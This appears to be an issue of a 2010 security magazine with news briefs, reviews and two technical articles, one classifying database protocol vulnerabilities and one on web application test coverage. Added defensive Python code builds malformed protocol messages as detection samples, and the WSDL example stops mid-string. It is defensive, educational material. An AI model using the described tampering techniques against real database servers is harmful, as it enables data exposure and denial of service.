Interim findings of first EU cyber exercise




The interim findings and recommendations of EU Member States participants of 
the 1st Pan-European Cyber Security Exercise indicate that Cyber Europe 2010 
was a useful cyber stress test for Europe's public bodies. The full report is to be 
published in early 2011. (www.net-security.org/secworld.php?id=10150) 



Free antispam for Linux mail servers 



BitDefender released Free Antispam for Linux Mail Servers, aimed at indi- 
viduals who run mail servers in environments other than Windows but are 
dissatisfied with the lackluster performance of existing open-source or pro- 
prietary antispam solutions. (www.net-security.org/secworld.php?id=10149) 



Security concerns make 1 in 3 users avoid online banking 




Survey chart: 48.50% "I do online banking, but I am concerned about the increase of Internet crime"; 31% "I never do online banking, due to security concerns, and instead go in person to the bank"; 20.50% "Of course I feel secure."



According to a survey by Avira, 1 in 3 people don't use online banking because they're concerned with safety and almost 50% are at least wary of online banking. That leaves just 20% of those surveyed with a confident approach to accessing financial accounts using the Internet. (www.net-security.org/secworld.php?id=10145)
Facebook bug compromises top pages



A customer of Sendible, an online marketing service for promoting and tracking brands through the use of social media, e-mail and SMS messaging, has inadvertently discovered a flaw in the Facebook API. Using Sendible's Facebook application, he tried to post messages on a few Facebook walls - as a fan - but the flaw apparently caused them to be posted as status messages from the owner of the pages. (www.net-security.org/secworld.php?id=10143)




First credit card with password generator 



Gemalto launched the first credit card to combine one-time password secu- 
rity capabilities with standard payment. This innovation allows banks to 
provide a single card that delivers both payment and increased security for 
online transactions. The new Gemalto Ezio product is immediately avail- 
able in the United States. (www.net-security.org/secworld.php?id=10141) 



Security vendor launches bug bounty 



Barracuda Networks announced their Security Bug Bounty Program, an initiative 
that rewards researchers who identify and report security vulnerabilities in the 
company's security product line. In the past, several technology companies have 
announced bug bounties; however, Barracuda Networks is the first security ven- 
dor to offer such a bold program, to reward researchers for identifying vulnerabili- 
ties in its own products. (www.net-security.org/secworld.php?id=10137) 




Hotmail gets full-session HTTPS 



Firesheep's developers can be satisfied. Not only has Microsoft started contemplating SSL for Bing, it has also provided its Hotmail users with the option of using HTTPS throughout their sessions. In addition to that, the SkyDrive, Photos, Docs, and Devices pages will all automatically use SSL encryption. (www.net-security.org/secworld.php?id=10132)



Data breaches cost hospitals billions 

Data breaches of patient information cost healthcare organizations nearly $6 billion annually, and many breaches go undetected, according to a study by the Ponemon Institute.

The research indicates that protecting patient data is a low priority for 
hospitals and that organizations have little confidence in their ability to 
secure patient records, putting individuals at great risk for medical identity 
theft, financial theft and embarrassment of exposure of private information. 
(www.net-security.org/secworld.php?id=10125)
Real-time phishing attacks increase

30% of attacks against websites that use two-factor authentication now utilize real-time man-in-the-middle techniques to bypass this trusted security mechanism, according to Trusteer. These findings are based on monitoring of thousands of phishing attacks. Authentication information typically captured and used by criminals in real-time phishing includes one-time passwords, tokens, SMS authentication, and cards and readers - rendering them ineffective against this type of attack. (www.net-security.org/secworld.php?id=10136)



AVG Technologies to acquire DroidSecurity 

AVG Technologies announced the acquisition of Tel Aviv-based DroidSecurity, a company focused on protecting smartphones, tablets and other devices running on Android. In October 2010, DroidSecurity's mobile security app, antivirus free, surpassed the 4.5 million download milestone, making it one of the most popular security applications on the Android platform. (www.net-security.org/secworld.php?id=10131)



Latest IE 0-day exploit finds its way into Eleonore toolkit 

Microsoft will likely be forced to issue an out-of-band patch for the zero-day vulnerability affecting Internet Explorer that has been discovered being exploited in the wild. Since then, the zero-day has been used to infect systems with the Pirpi and Hupigon Trojans, which open a backdoor into the system. But, more importantly, AVG has detected the exploit code in the well-known Eleonore exploit toolkit, so we can expect an increase in the number of attacks. (www.net-security.org/secworld.php?id=10128)



Royal Navy site hack forces MoD to suspend website 







A Romanian hacker has claimed to have broken into the main British Royal Navy website, and posted sensitive information such as usernames and administrator passwords. At the time, the Royal Navy had replaced its entire website with a static image which says, "Unfortunately the Royal Navy website is currently undergoing essential maintenance. Please visit again soon." (www.net-security.org/secworld.php?id=10122)



Firesheep countermeasure tool BlackSheep 

Firesheep is the Firefox extension that makes it easier to steal logins and 
take over social media and email accounts after users log in from a WiFi 
hotspot or even their own unprotected network. Zscaler researchers have 
created, and are now offering to every consumer, a free Firefox plugin called 
BlackSheep, which serves as a counter-measure. BlackSheep combats 
Firesheep by monitoring traffic and then alerting users if Firesheep is being 
used on the network. (www.net-security.org/secworld.php?id=10118) 
Extract and analyze digital evidence from Mac OS X systems

ATC-NY released Mac Marshal 2.0 which automates the forensics 
process for a cyber investigator. It scans a Macintosh disk, auto- 
matically detects and displays Macintosh and Windows operating 
systems and virtual machine images, then runs a number of 
analysis tools to extract Mac OS X-specific forensic evidence writ- 
ten by the OS and common applications. (www.net-security.org/secworld.php?id=10120) 




Myanmar cut off from the Internet ahead of elections

The Southeast Asian country of Myanmar (formerly known as Burma) has been practically cut off from the Internet as an extensive DDoS attack that started in late October has crippled most network traffic in and out of the country. It is still unknown who is behind the attacks. Speculation abounds that the Burmese government might have something to do with it, since the first general elections in 20 years were to be held, and the military junta currently in power is probably as unwilling to hand it over as it was two decades ago. (www.net-security.org/secworld.php?id=10108)




Hole in iPhone PayPal app allows account hijacking 

PayPal customers that use the payment company's iPhone application to effectuate 
payments should update it as soon as possible, because a vulnerability that can be 
exploited to hijack their accounts has been found by a security researcher and con- 
firmed by PayPal. The flaw doesn't affect the PayPal site or the company's Android 
application, but the 4+ million people who downloaded the iPhone application so far 
are in danger of getting their passwords intercepted by a hacker if they connect over 
unsecured Wi-Fi networks. (www.net-security.org/secworld.php?id=10102) 




Popular online services graded on SSL implementation 

It seems that Firesheep has succeeded where similar tools have failed in the 
past: the issue of full end-to-end encryption for all websites - especially the 
most popular ones - is finally getting the attention it deserves. And among 
those who view Firesheep's advent as the perfect excuse to point out - and 
keep pointing out - the need for SSL use is journalist George Ou. 
(www.net-security.org/secworld.php?id=10097)




Free Mac anti-virus for home users 
Sophos announced the availability of a free Mac anti-virus product for home users. Based on Sophos's security software, which protects over 100 million business users worldwide, Sophos Anti-Virus Home Edition for Mac is available for consumers to download at no charge. (www.net-security.org/secworld.php?id=10085)



www.insecuremag.com






Human rights organization targeted with cyber attack 



The website of a human rights organization has been knocked offline by a DDoS attack they suspect to have been organized either by the Indonesian or the Botswana authorities. "This attack comes one week after Survival International reported on a video of Indonesian soldiers torturing Papuan tribal people, and four weeks after calling for tourists to boycott Botswana over the long-running persecution of the Kalahari Bushmen," the organization said in a statement. (www.net-security.org/secworld.php?id=10090)



The aftermath of the Bredolab botnet shutdown 




The war against botnets will be long and hard. For one thing, command and control centers can be replaced and the targeted botnet resurrected in a relatively short time if the infected machines aren't cleaned. The high-profile shutdown of the Bredolab botnet's command and control servers by the Dutch Police is a perfect example of how such half-measures are not effective in the long run, since the number of remaining C&Cs is slowly rising again. (www.net-security.org/secworld.php?id=10089)




Spying app kicked out of Android Market 




Secret SMS Replicator, a spying application that forwards contents of a user's text messages to the phone of the person who installed it in the first place, has been booted out of the Android Market. Once the application in question is installed, there is no visible shortcut or icon to alert the user about the spying that is in progress, so one can see why this would be a problem for Google. (www.net-security.org/secworld.php?id=10082)



Facebook discovers and "punishes" UID-selling developers 

The recent discovery that some Facebook applications were inadvertently forwarding users' UIDs to advertising agencies and data collection companies has spurred the social network to investigate the matter thoroughly and to try to think of a platform-wide solution that would prevent that from happening ever again. (www.net-security.org/secworld.php?id=10079)




Fabric weaves security into program code 



Wouldn't it be wonderful if we could build security into a program as it is written? This idea spurred a number of researchers from Cornell University to try and develop a new platform and a new language for building secure information systems, which they dubbed Fabric. Comparing the current situation of software patching with messy layers of duct tape, Andrew Myers, one of the researchers and a professor of computer science, says that security vulnerabilities are nearly inevitable. With Fabric, they plan to replace all those software layers with one that will enforce security from the get-go. (www.net-security.org/secworld.php?id=10051)
New PCI standards completed, tokenization still in question



The PCI Security Standards Council released version 2.0 of the PCI DSS and PA-DSS, designed to provide clarity and flexibility to facilitate improved understanding of the requirements and eased implementation for merchants. Version 2.0 becomes effective on January 1, 2011 and does not introduce any new major requirements. (www.net-security.org/secworld.php?id=10070)




Most Americans support an Internet kill switch 




Sixty-one percent of Americans said the President should have the ability to shut down portions of the Internet in the event of a coordinated malicious cyber attack. The findings illustrate that recent events may have heightened the American public's awareness of and concern over global and domestic cybersecurity threats. (www.net-security.org/secworld.php?id=10056)



80% of firms don't know who should secure cloud data 



The cloud is still akin to the Wild West when it comes to the security of the data hosted there, according to Courion. In fact, 1 in 7 companies admit that they know there are potential access violations in their cloud applications, but they don't know how to find them. (www.net-security.org/secworld.php?id=10049)



MySpace apps send user IDs to advertisers 



This is not the first time MySpace has been found "oversharing" - at the time, they said they were working on a method to obfuscate the ID information sent to ad agencies via "HTTP referrers". (www.net-security.org/secworld.php?id=10041)



Europe's largest security training event 

SANS London 2010 is Europe's largest training event for information and security professionals, which is celebrating its 5th anniversary this year with one of the most comprehensive programs to date. This year's event comprises 14 courses covering software and audit, management and compliance, as well as new additions around security within virtualized environments, network forensics and ethical hacking. (www.net-security.org/secworld.php?id=9932)



Finding and managing SSL digital certificates 

Digital certificates represent a necessary security technique for encrypting transmissions and securing digital identities in today's enterprise. To assist organizations in gaining a complete perspective of deployed certificates, Entrust introduced Entrust Discovery. The easy-to-use solution finds, inventories and manages digital certificates across diverse systems to prevent outages, data breaches and non-compliance. (www.net-security.org/secworld.php?id=9949)
Database protocol exploits explained

by Amichai Shulman 




In the past few years we have seen a significant increase in attacks targeting 
database communication protocols. This article describes the protocols and 
the risks as well as relevant remediation techniques. 



Introduction to database communication 
protocols 

The syntax and semantics of data access and management commands are mostly defined by a well-known standard called ANSI SQL. However, other important aspects of the client-server interaction, such as the method for creating a client session, conveying the commands from a client to a server, the method for returning data and status to a client, the structure of the returned data and the implementation of mechanisms such as cursors, prepared statements and transactions, are not defined. These details are filled in by vendor-specific technology.

Vendors usually implement these functions via an independent application messaging layer that can be transported on a variety of network protocols. Examples include SQL*NET from Oracle, TDS from Sybase, another strand of TDS from Microsoft, and DRDA from IBM.

Vulnerabilities explained 

Several classes of vulnerabilities exist when 
analyzing the security aspects of proprietary 
database communication protocols. The Im- 
perva ADC classifies these vulnerabilities 
based on the type of manipulation needed for 
an exploit: 

• Message structure tampering 

• Field size tampering 

• Field content manipulation 

• Message sequence tampering. 

Other vulnerabilities do not require any manipulation or tampering. An example is an Oracle vulnerability fixed in April 2008. Oracle provides various modes of the export functionality, one of which is called Direct Path. This mode uses a special protocol message (0x5B) to extract table data rather than SQL queries. Using this special protocol message, an attacker could extract information from tables and views to which she has not been granted access.

Message structure tampering 
vulnerabilities 

A protocol message structure can be de- 
scribed as a list of fields, where each field has 
a specific role and expected format. Message 
structure tampering vulnerabilities yield at- 
tacks against the parsing mechanism that 
typically result in memory corruption. 

The main tampering techniques of this cate- 
gory include removing, adding or duplicating 
fields in a message or combining fields in an 
unexpected manner. 

An example is an IBM DB2 vulnerability published in September 2006. One of the connection establishment messages contains an optional database-name field. However, when the message is sent without the "optional" database-name, an unhandled exception condition occurs on the server, making the database inaccessible to all clients.

Field size manipulation 

Occasionally, fields in a message have their 
sizes explicitly declared using another dedi- 
cated field. Field size manipulation can be 
used to create buffer overflow attacks yielding 
execution of arbitrary code. This occurs when 
the length indicator is capable of expressing 
larger data sizes than actually supported by 
the server software. 

In October 2009, Oracle released a patch fix- 
ing this type of vulnerability which, if exploited, 
affects the confidentiality, integrity and avail- 
ability of the database. 

Another risk occurs when a message includes 
redundant size fields and does not validate 
consistency between all size related fields. An 
example is the TDS "Hello" message (Figure 
1). In this case, the size indicator of an indi- 
vidual field can be set larger than the size of 
the entire message. This causes arbitrary 
memory buffers to be dumped to the network 
connection, thus exposing sensitive informa- 
tion, even passwords (Figure 2). 




Figure 1: TDS Hello message - field size larger than total message size (yellow highlight: total message size; red highlight: local field size).

Figure 2: Sample buffer dumped by the server showing names of connected users (sa).

Field content manipulation

Content manipulation can yield different types 
of attacks including privilege elevation, audit 
evasions and Denial of Service attacks. 

An example of this is a DB2 Universal Data- 
base (UDB) vulnerability fixed in December 
2009. The underlying DB2 network protocol 
translates administration command calls to a 
pre-defined administrative stored procedure 
call. A variable that signifies the type of com- 
mand that should be performed is passed to 
that stored procedure. 

For instance, a client's 'load' command would be passed as the value 0xA6 to this administrative stored procedure. However, an attacker may change the value of the variable to one that would cause the server to crash. Such tampering terminates the DB2 UDB service, effectively denying service to all database users.

Message sequence tampering 

An attacker can issue an irregular sequence 
of well-formed protocol messages that will ef- 
fectively render the server inaccessible. Ex- 
ploiting vulnerabilities of this type sometimes 
requires basic scripting capabilities but often 
can be pursued without automation. 

An IBM Informix server vulnerability, patched in 2007, allowed an attacker to send server information requests in a sequence which the server did not anticipate. This caused the server to panic and terminate unexpectedly.

New attack types require new protection 
solutions 

Proactive security measures by internal 
server mechanisms cannot be guaranteed as 
programming flaws exist and will continue to 
exist. Database vendors suggest reactive pro- 
tection (patching). However, patching in data- 
base environments usually takes a very long 
time. Traditional IDS/IPS products offer only a 
partial solution because they lack proper in- 
sight into the protocols used by database 
servers. 

A sound security solution should be coupled 
with existing database protection mecha- 
nisms. A database IDS/IPS solution must 
have thorough understanding of the commu- 
nications protocol used by the database 
server. This can provide proactive validation 
of protocol messages. Any message or mes- 
sage sequence that does not comply with ex- 
pected behavior can be flagged or discarded. 

It also provides a reactive mechanism based 
on signatures to provide accurate detection 
and blocking of known exploits. The combina- 
tion of proactive and reactive solutions should 
provide the best protection against these 
classes of database attacks. 
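As an added illustration (written for this edit; not Imperva's code and not any real vendor's wire format), the following Python validator applies the proactive checks described in the sections above to a constructed, hypothetical message layout: required-field presence (message structure), each declared field length checked against the message total and the supported maximum (field size, the TDS Hello case), an allow-list for the administrative command code (field content), and a per-session state machine (message sequence). The layout, field ids, state names and the 256-byte limit are assumptions; only the 0xA6 command value comes from the article.

```python
import struct

# Constructed, hypothetical wire format (not a real vendor protocol): message types and field ids.
MSG_HELLO, MSG_LOGIN, MSG_QUERY, MSG_ADMIN = 0x01, 0x02, 0x03, 0x04
F_CLIENT, F_USER, F_DBNAME, F_SQL, F_ADMIN_CMD = 0x10, 0x11, 0x12, 0x20, 0x30

# Structure: fields each message type must carry (cf. the DB2 message whose "optional" db name was required).
REQUIRED_FIELDS = {MSG_HELLO: {F_CLIENT}, MSG_LOGIN: {F_USER, F_DBNAME},
                   MSG_QUERY: {F_SQL}, MSG_ADMIN: {F_ADMIN_CMD}}
# Size: largest payload the server actually supports, although the 2-byte length can express 65535.
MAX_FIELD_LEN = 256
# Content: admin command codes the server knows; 0xA6 ('load') is the DB2 value quoted in the article.
KNOWN_ADMIN_CMDS = {0xA6}
# Sequence: message types allowed in each session state, and the state each one leads to.
ALLOWED_IN_STATE = {"new": {MSG_HELLO}, "greeted": {MSG_LOGIN}, "session": {MSG_QUERY, MSG_ADMIN}}
NEXT_STATE = {MSG_HELLO: "greeted", MSG_LOGIN: "session", MSG_QUERY: "session", MSG_ADMIN: "session"}


def build_message(msg_type, fields):
    """Encode a well-formed message: >H total length, B type, then (B id, H len, data) per field."""
    body = b"".join(struct.pack(">BH", fid, len(data)) + data for fid, data in fields)
    return struct.pack(">HB", 3 + len(body), msg_type) + body


def parse_fields(raw):
    """Walk the fields without trusting any declared size; return (fields, findings)."""
    fields, findings = {}, []
    if len(raw) < 3:
        return fields, ["message shorter than header"]
    total = struct.unpack_from(">H", raw, 0)[0]
    if total != len(raw):
        findings.append(f"total length {total} != bytes received {len(raw)}")
    pos = 3
    while pos < len(raw):
        if pos + 3 > len(raw):
            findings.append("truncated field header")
            break
        fid, flen = struct.unpack_from(">BH", raw, pos)
        pos += 3
        if flen > MAX_FIELD_LEN:
            findings.append(f"field 0x{fid:02x}: length {flen} exceeds supported {MAX_FIELD_LEN}")
        if pos + flen > len(raw):  # the TDS Hello case: local size larger than the whole message
            findings.append(f"field 0x{fid:02x}: length {flen} runs past end of message")
            break
        if fid in fields:
            findings.append(f"field 0x{fid:02x}: duplicated")
        fields[fid] = raw[pos:pos + flen]
        pos += flen
    return fields, findings


def validate(raw, state):
    """Return (findings, next_state); a message with findings is discarded and the state stays put."""
    fields, findings = parse_fields(raw)
    if len(raw) < 3:
        return findings, state
    msg_type = raw[2]
    if msg_type not in ALLOWED_IN_STATE.get(state, set()):
        findings.append(f"type 0x{msg_type:02x} not expected in state '{state}'")
        return findings, state
    for fid in sorted(REQUIRED_FIELDS[msg_type] - set(fields)):
        findings.append(f"field 0x{fid:02x}: required but absent")
    if msg_type == MSG_ADMIN and F_ADMIN_CMD in fields:
        cmd = fields[F_ADMIN_CMD]
        if len(cmd) != 1 or cmd[0] not in KNOWN_ADMIN_CMDS:
            findings.append(f"admin command {cmd.hex()} not in allow-list")
    return findings, (state if findings else NEXT_STATE[msg_type])


def run_session(messages, state="new"):
    """Feed raw messages through the validator in order; return (per-message findings, final state)."""
    report = []
    for raw in messages:
        findings, state = validate(raw, state)
        report.append(findings)
    return report, state


# Constructed sample traffic: a clean session, then one message per tampering class.
CLEAN_SESSION = [build_message(MSG_HELLO, [(F_CLIENT, b"app")]),
                 build_message(MSG_LOGIN, [(F_USER, b"sa"), (F_DBNAME, b"master")]),
                 build_message(MSG_QUERY, [(F_SQL, b"SELECT 1")])]
_hello = bytearray(CLEAN_SESSION[0])
_hello[4:6] = struct.pack(">H", 4000)                               # local field size > total size
OVERSIZED_HELLO = bytes(_hello)
LOGIN_WITHOUT_DB = build_message(MSG_LOGIN, [(F_USER, b"sa")])      # required field removed
UNKNOWN_ADMIN = build_message(MSG_ADMIN, [(F_ADMIN_CMD, b"\xff")])  # command code not known
QUERY_BEFORE_LOGIN = CLEAN_SESSION[2]                                # out of sequence

if __name__ == "__main__":
    print(run_session(CLEAN_SESSION))
    for raw, state in [(OVERSIZED_HELLO, "new"), (LOGIN_WITHOUT_DB, "greeted"),
                       (UNKNOWN_ADMIN, "session"), (QUERY_BEFORE_LOGIN, "new")]:
        print(state, validate(raw, state)[0])
```

A real database IDS/IPS would replace the constructed layout with the vendor's actual message grammar, but the principle is the same: every size field is checked against every other size field and against the bytes actually received before anything is parsed.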



Amichai Shulman is the co-founder and CTO of Imperva (www.imperva.com), where he heads the Application 
Defense Center, Imperva's research organization focused on security and compliance. Under his direction, the 
ADC has been credited with the discovery of serious vulnerabilities in commercial Web application and data- 
base products, including Oracle, IBM, and Microsoft. 
Entrust understands. Your organization is at war against online fraud and you've got significant resources invested into your current fraud detection solution. Unfortunately, today's online fraud attacks act and adapt very quickly. Notorious strains, such as the infamous Zeus virus, even elude many solutions put in place by financial institutions to thwart the first- and second-generation threats.

A layered defense. But today's attacks are more advanced — and constantly evolve. To help defend against advanced malware, financial institutions should adopt a proven, layered defense that consists of:

• Strong Two-Factor Authentication

• Behavioral & Transactional Fraud Detection

• Out-of-Band Transactional Verification & Signature

The Entrust approach. The Entrust IdentityGuard versatile authentication platform and the Entrust TransactionGuard fraud detection solution combine to form a proven, integrated strategy for protecting consumers and business-banking customers from online fraud and man-in-the-browser attacks. And they both complement your existing deployed solutions.

Let's talk. Visit entrust.com/MITB to discover how Entrust's proven approach can complement your existing fraud detection solution. And protect your organization from Zeus and other malicious malware.

+1 888 690 2424 | entrust.com | entrust@entrust.com | +44 (0) 118 953 3000
Review: MXI M700 Bio

by Mark Woodstone 



MXI Security is the security division of Memory Experts International, a com- 
pany specializing in memory expansion modules and data storage systems. 
MXI provides Stealth Key portable devices, Stealth HD encrypted hard drives, 
as well as standalone and enterprise software solutions supporting their 
products. They've recently shipped us a copy of their 4 GB M700 Bio, a port- 
able security device with biometric authentication. 



The device is powered by a Bluefly Processor 
which provides on-board hardware AES 256- 
bit encryption, authentication and manageabil- 
ity, and incorporates a biometric fingerprint 
reader. 

The M700 Bio is used as a typical USB stick. It doesn't need a driver installation since everything is done locally on board the device.

From a single user perspective, setting up the M700 Bio is a piece of cake. After connecting it to the computer for the first time, you will be guided through the customization process where you'll choose the appropriate level of security to suit your needs.

You're able to authenticate to the device with 
a default option of a fingerprint swipe, or en- 
able two factor authentication by adding the 
password to the login procedure. I liked the 
fact that you can specify the number of nu- 
meric or, for instance, uppercase characters 
every password must contain. 

The biometrics on the device worked flawlessly. The user is asked by default to enroll two fingers and five successful swipes are needed to finalize the enrollment process. During the weeks I used the device, I haven't had a single unsuccessful instance of fingerprint swiping.

Leaving the authentication feature aside, 
M700 Bio is a portable storage device. After a 
successful authentication, you will get instant 
access to the private partition that can be 
used for storing your data. The device sup- 
ports three flavors of Microsoft Windows - XP, 
Vista and 7 - as well as Mac OS X. 

You can control the size of your on-board par- 
titions and - from a security standpoint - be- 
sides the two factor authentication procedure 
needed to access the files, everything is also 
secured by hardware based AES-256 CBC 
encryption. 

The disk can also be mounted as read only (malware control), which should come in quite handy when using the device on untrusted computers.

Along with all the software layers of security, the device has its physical strengths as well - it is coated with a waterproof and dustproof high-strength magnesium enclosure. As this is a portable device, the ergonomic fingerprint swiping area is, of course, located under the hood.
Screenshot: Enroll Biometric
The M700 can also be enabled with MXI
Stealth Zone, the company's innovative plat- 
form for deploying a Secure USB Desktop on 
security devices from their product line. 

This basically lets users who have authenticated to the device log into Windows and use a temporary active desktop that stays on the device and doesn't leave any traces on the computer it was used on. This is made possible by MXI Security's FIPS 140-2 Level 3 validated Bluefly processor technology.



The device is made ready for the enterprise by ACCESS Enterprise, the company's solution which allows administrators to remotely deploy, customize and manage the entire range of MXI Security encrypted drives. Through a partnership with McAfee, ACCESS adds an anti-virus and anti-malware scanner for additional protection.

With all of its security features, the M700 Bio is the perfect solution for all users who don't want to leave anything to chance. The various layers of security should inspire confidence even in the most paranoid of us.
Mark Woodstone is a security consultant who works for a large Internet Presence Provider (IPP) that serves about 4000 clients from 30 countries worldwide.
Latest additions to our bookshelf




Seven Deadliest Wireless Technologies Attacks 

By Brad Haines 

Syngress, ISBN: 1597495417 



This book introduces the reader to the anatomy of attacks aimed at wireless 
technologies and devices that use them. You'll learn what it takes to execute 
infrastructure attacks on wireless networks; which client-side attacks you 
should look out for; how Bluetooth, RFID, and encryption can be cracked; and 
why you should be careful when using analog wireless devices, cell phones 
and other hybrid devices. You will discover the best ways to defend against 
these vicious hacks with step-by-step instruction and learn techniques to make 
your computer and network impenetrable. 




Cyber War: The Next Threat to National Security and What to Do About It 

By Richard A. Clarke and Robert Knake 

Ecco, ISBN: 0061962236 





Cyber War is a book about technology, government, and military strategy; about 
criminals, spies, soldiers, and hackers. This is the first book about the war of the 
future -- cyber war -- and a convincing argument that we may already be in peril 
of losing it. 

It goes behind the "geek talk" of hackers and computer scientists to explain 
clearly and convincingly what cyber war is, how cyber weapons work, and how 
vulnerable we are as a nation and as individuals to the vast and looming web of 
cyber criminals. 
Seven Deadliest Network Attacks

By Stacy Prowell, Rob Kraus and Mike Borkin 
Syngress, ISBN: 1597495492 

Part of Syngress' "The Seven Deadliest Attack Series", this book introduces 
the reader to the anatomy of attacks aimed at networks: DoS, MiTM, war 
dialing, penetration testing, protocol tunneling, password replay and spanning 
tree attacks. 

This book pinpoints the most dangerous hacks and exploits specific to 
networks, laying out the anatomy of these attacks including how to make your 
system more secure. 
Seven Deadliest Microsoft Attacks

By Rob Kraus, Brian Barber, Mike Borkin and Naomi Alpern 
Syngress, ISBN: 1597495514 

This book introduces the reader to the anatomy of attacks aimed at Microsoft's 
networks and software: Windows, SQL and Exchange Server, Microsoft Office, 
SharePoint and the Internet Information Services. 

The text is peppered with warnings, notes, recommendations and so-called 
"Epic Fail" text boxes that illustrate some of the typical mistakes made when 
working with that particular software. 




Fatal System Error: The Hunt for the New Crime Lords Who Are Bringing Down the Internet

By Joseph Menn 

PublicAffairs, ISBN: 1586489070 

In this disquieting cyber thriller, Joseph Menn takes readers into the murky 
hacker underground, traveling the globe from San Francisco to Costa Rica and 
London to Russia. His guides are California surfer and computer whiz Barrett 
Lyon and a fearless British high-tech agent. Through these heroes, Menn shows 
the evolution of cybercrime from small-time thieving to sophisticated, organized 
gangs, who began by attacking corporate websites but increasingly steal financial 
data from consumers and defense secrets from governments. Using 
unprecedented access to Mob businesses and Russian officials, the book reveals 
how top criminals earned protection from the Russian government. 

Seven Deadliest Web Application Attacks 

By Mike Shema 

Syngress, ISBN: 1597495433 

This book pinpoints the most dangerous hacks and exploits specific to web 
applications, laying out the anatomy of these attacks including how to make 
your system more secure. You will discover the best ways to defend against 
these vicious hacks with step-by-step instruction and learn techniques to make 
your computer and network impenetrable. Attacks detailed in this book include: 
Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), SQL 
Injection, server misconfiguration and predictable pages, breaking 
authentication schemes, logic attacks, and malware and browser attacks. 
Measuring web application security coverage

by Rafal Los




Businesses are under constant threat of the next security breach caused by 
malware, SQL injection and viruses. Could we be setting the stage for even 
more security breaches by not fully understanding the applications that run 
our businesses? 



Web applications pose a particularly dangerous type of threat to an enterprise due to their functional complexity and highly extensible nature. Exposing functionality beyond the corporate perimeter is dangerous, but exposing poorly understood, hastily coded and hardly tested functionality at layer seven is enough to keep security professionals up at night.

Even when presented with the opportunity to test applications before they are released to production, few security professionals are equipped to answer the burning question: "How much of the application was tested?"

The question of security coverage is often carefully avoided or ignored altogether, but neither option should be acceptable, as it raises business risk. In this article, we will discuss some of the complexities which make answering the question "How much of the application was tested?" so difficult. We will also explore how it can be addressed using manual or automated methods.

Understanding the problem

The core issue is that testing is conducted with a limited amount of time and computing power. These limitations should push testers to understand the full risk profile of an application before any security testing is conducted.

Testers should know the full scope of the application and determine the "reach" of each of its components. When an application is not comprehensively assessed, it cannot be properly tested for security vulnerabilities, and the results are of little value. For example, if a penetration tester has 40 hours to perform a security analysis of an application, a simple report of vulnerabilities is not helpful without knowing how much of the application's attack surface was covered during the testing period.

Today, few web application security analyses provide coverage metrics, much less accurate ones, which gives the consumer of the report a potential false sense of security. Whether the testing methodology involves manual testing, an automated tools-based approach, or a hybrid approach, the lack of coverage metrics is alarming and growing more so as the complexity of "Web 2.0" applications continues to grow. This is dangerous because the consumers of these reports are the ones empowered to make decisions about risk, yet they do not have the full set of data to make educated risk decisions.

Understanding applications

Understanding "coverage" is not as simple as asking how many pages are in an application. While that may have been adequate in the early 2000s, today this method is mostly ineffective thanks to the MVC model and similar frameworks, which abstract the idea of "pages" on the server, in the controller, from what is physically presented to the end user's browser in the "view".

Expert application security testers agree that understanding the web application is critical to successfully attacking it. Amazingly though, even seasoned testers do not have a solid methodology for assessing and representing coverage. The issue lies in the difficulty of mapping an application's true attack surface.

Using a layered approach starting at the client user interface is one methodology that may prove to be successful for mapping the total attack surface of a web application. Below, we'll address the methodology, practical applications, and further research needed.






User Interface (UI) perspective

The UI coverage perspective looks at the application from the viewpoint of the components exposed to the user through the user interface, most commonly the browser. The UI perspective covers functions available through the user interface, including JavaScript-driven events, AJAX calls, forms, and client-side technologies such as Flash, Silverlight and others.

Identifying each unique action and stringing them together through workflow mapping (such as the use of an Execution Flow Diagram [EFD]) can give a clear picture of the total surface area of an application.

The UI perspective is difficult to fully map due to the extreme complexity of user interface components. To illustrate this point, let's look at a cascading JavaScript-based menu system in a typical web-based application. If there are 5 top-level menu items, each with 5 sub-items, each with 3 sub-sub-items, the number of leaf selections is already 5 × 5 × 3 = 75, before counting the 30 intermediate items, each of which may itself trigger a request. This only accounts for a basic component of the web application, the menu system. In order to fully understand the attack surface of an application the tester must logically segment it into units, such as a menu system, and work out the complexity of each unit from that angle.

Ultimately, calculating complexity is not as simple as doing some basic algebra. The UI perspective must also account for client-side objects such as Flash and Silverlight components. This involves exercising all the available "user-visible" components such as buttons, menus and interactive media in order to map the whole attack surface.

To further complicate the situation, the UI perspective also includes components that are not directly user-driven, such as AJAX calls. While these execute in the user interface (browser), they are not triggered entirely by the user, which makes them difficult to map without digging into the request/response traffic between the client and server.
Application Programming Interface (API) perspective

The API-coverage perspective addresses the application at the programming interface, the exposed interface between the application and external components. The most common way of publishing an API is as a web service: XML-based data structures carried over the Simple Object Access Protocol (SOAP), or, in the more common "Web 2.0" style, XML or JSON (JavaScript Object Notation) payloads exchanged over plain HTTP following Representational State Transfer (REST) conventions. (REST is an architectural style rather than a protocol, and JSON is not carried over SOAP.)

Digging into this coverage requires an understanding of data structures and the ability to read code at a basic level. The simplest way of mapping the attack surface of a web-service-based API is through the Web Services Description Language (WSDL) document. This document gives an XML-based model of the services the web service exposes. Parsing the WSDL file (.wsdl) yields concrete knowledge about a web service, including the types of messages the web service responds to, the data formats expected, and the ports used in communication.

This information can be used to test each of the service methods while security testing is being performed. WSDL 1.1 defines HTTP GET/POST bindings and WSDL 2.0 an HTTP binding, so a WSDL can describe plain HTTP (REST-style) interfaces as well as SOAP, but most RESTful services publish no WSDL at all. Without one, the tester is left attempting to dig into the functional specification of the application to understand the full attack surface.

Computing a complete coverage map of a web-service-based API requires a good understanding of the exposed services, methods and data structures. Rigid, schema-described XML structures can be enumerated directly from the WSDL and XSD, while JSON payloads are usually not governed by a published schema, so their additional attack surface has to be inferred by parsing observed serialized data.
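The WSDL-driven enumeration described above, as an added example that is not part of the original article: it parses a constructed WSDL 1.1 document (the AccountsService, its three operations and the endpoint URL are fictitious) with Python's standard library, pulls out each operation, its SOAPAction, the parameters and XSD types its input message accepts and the port address, then marks off which operations a test run actually exercised. Stripping namespace prefixes instead of resolving them is a simplification that assumes a single target namespace.

```python
"""Enumerate the attack surface a WSDL 1.1 document exposes and report API coverage.
Added example: the service, operations and URL below are constructed."""
import xml.etree.ElementTree as ET

NS = {
    "wsdl": "http://schemas.xmlsoap.org/wsdl/",
    "soap": "http://schemas.xmlsoap.org/wsdl/soap/",
    "xsd": "http://www.w3.org/2001/XMLSchema",
}

SAMPLE_WSDL = """<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
  xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
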